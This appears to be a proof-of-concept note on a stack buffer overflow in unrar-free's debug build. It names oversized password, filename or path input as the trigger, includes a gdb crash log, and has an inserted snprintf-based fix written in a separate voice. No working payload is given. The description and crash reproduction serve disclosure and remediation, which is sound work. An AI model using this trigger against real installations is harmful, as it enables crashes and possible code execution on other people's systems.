my-exploits/pocs/unrar-free/buffer-overflow/DESCRIPTION
unrar-free suffers from a stack overflow vulnerability because of a fixed size buffer when compiled with debug options.

unrar-lib.c
........ LINE 42
#define _DEBUG_LOG 1
#ifdef _DEBUG_LOG /* define macros for debugging */
..........

A fixed size buffer is allocated for the DebugMsg:
#ifdef _DEBUG_LOG
char DebugMsg[500]; /* used to compose debug msg */
#endif
........

The sprintf function formats the string with our controlled input, and if the formatted output is longer than 500 bytes the stack buffer overflows:
#ifdef _DEBUG_LOG
sprintf (DebugMsg, "Extracting \"%s\" from \"%s\" (password is \"%s\")...", filename, (char *) rarfile, libpassword ? libpassword : "");
debug_log (DebugMsg);
#endif
........

There are multiple ways to trigger the stack overflow: from the filename (limited to 255 chars by the file system), from the path, and, most reliably, from the password input.
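The fix a maintainer would want is bounded formatting: replace the unbounded sprintf with snprintf, pass the size of the destination, and treat truncation as a signalled condition rather than silently writing past the buffer. The following is an added example, not unrar-free's code; the function name compose_debug_msg, the helper long_password_is_truncated and the DEBUG_MSG_SIZE constant are my own naming, and the 500-byte size mirrors the DebugMsg declaration above. The backtrace further down (the __sprintf_chk and __fortify_fail frames) shows glibc's _FORTIFY_SOURCE turning the overflow into an abort; a bounded call avoids the overflow in the first place instead of relying on that check.

```c
#include <stdio.h>
#include <string.h>

/* Same fixed size as the DebugMsg buffer described above (assumption: kept for illustration). */
#define DEBUG_MSG_SIZE 500

/* Hardened replacement for the unbounded sprintf call (added example, not the project's code).
 * Formats into 'out' without ever writing more than 'outsz' bytes.
 * Returns 1 if the whole message fit, 0 if it was truncated (or on a format error). */
int compose_debug_msg(char *out, size_t outsz,
                      const char *filename, const char *rarfile,
                      const char *libpassword)
{
    /* snprintf returns the length the full message would have had, excluding the NUL,
     * so comparing it against outsz tells us whether truncation happened. */
    int n = snprintf(out, outsz,
                     "Extracting \"%s\" from \"%s\" (password is \"%s\")...",
                     filename, rarfile, libpassword ? libpassword : "");
    if (n < 0) {
        if (outsz > 0)
            out[0] = '\0';
        return 0;
    }
    return (size_t)n < outsz;
}

/* Reproduces the scenario from the description with a constructed 599-byte password:
 * the message is truncated to DEBUG_MSG_SIZE - 1 characters and remains NUL-terminated,
 * instead of overflowing the stack. Returns 1 when that is observed. */
int long_password_is_truncated(void)
{
    char msg[DEBUG_MSG_SIZE];
    char pw[600];                      /* constructed oversized password */
    memset(pw, 'A', sizeof pw - 1);
    pw[sizeof pw - 1] = '\0';

    int fit = compose_debug_msg(msg, sizeof msg, "file.txt", "archive.rar", pw);
    return fit == 0 && strlen(msg) == DEBUG_MSG_SIZE - 1;
}
```

Callers that need the full text (for example a debug log that must not lose the file name) can check the return value and fall back to a heap-allocated buffer sized from snprintf's return, but the important property is that the stack buffer is never written beyond its declared size.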
gdb-peda$ run
Starting program: /usr/local/bin/unrar -x archive.rar -p
Password: INPUT HERE A STRING LARGER THEN 500
unrar 0.0.1 Copyright (C) 2004 Ben Asselstine, Jeroen Dekkers
Extracting from /home/fuzzer/fuzz-sessions/rar/i/archive.rar
file header broken
*** buffer overflow detected ***: /usr/local/bin/unrar terminated
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7ffff7a847e5]
/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x5c)[0x7ffff7b2611c]
/lib/x86_64-linux-gnu/libc.so.6(+0x117120)[0x7ffff7b24120]
/lib/x86_64-linux-gnu/libc.so.6(+0x116689)[0x7ffff7b23689]
/lib/x86_64-linux-gnu/libc.so.6(_IO_default_xsputn+0x80)[0x7ffff7a886b0]
/lib/x86_64-linux-gnu/libc.so.6(_IO_vfprintf+0x139b)[0x7ffff7a5b50b]
/lib/x86_64-linux-gnu/libc.so.6(__vsprintf_chk+0x84)[0x7ffff7b23714]
/lib/x86_64-linux-gnu/libc.so.6(__sprintf_chk+0x7d)[0x7ffff7b2366d]
/usr/local/bin/unrar[0x40f6cd]
/usr/local/bin/unrar[0x404f47]
/usr/local/bin/unrar[0x406383]
/usr/local/bin/unrar[0x401f57]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7ffff7a2d830]
/usr/local/bin/unrar[0x401f89]
======= Memory map: ========
00400000-00413000 r-xp 00000000 fc:00 13209 /usr/local/bin/unrar
00612000-00613000 r--p 00012000 fc:00 13209 /usr/local/bin/unrar
00613000-00614000 rw-p 00013000 fc:00 13209 /usr/local/bin/unrar
00614000-0063a000 rw-p 00000000 00:00 0 [heap]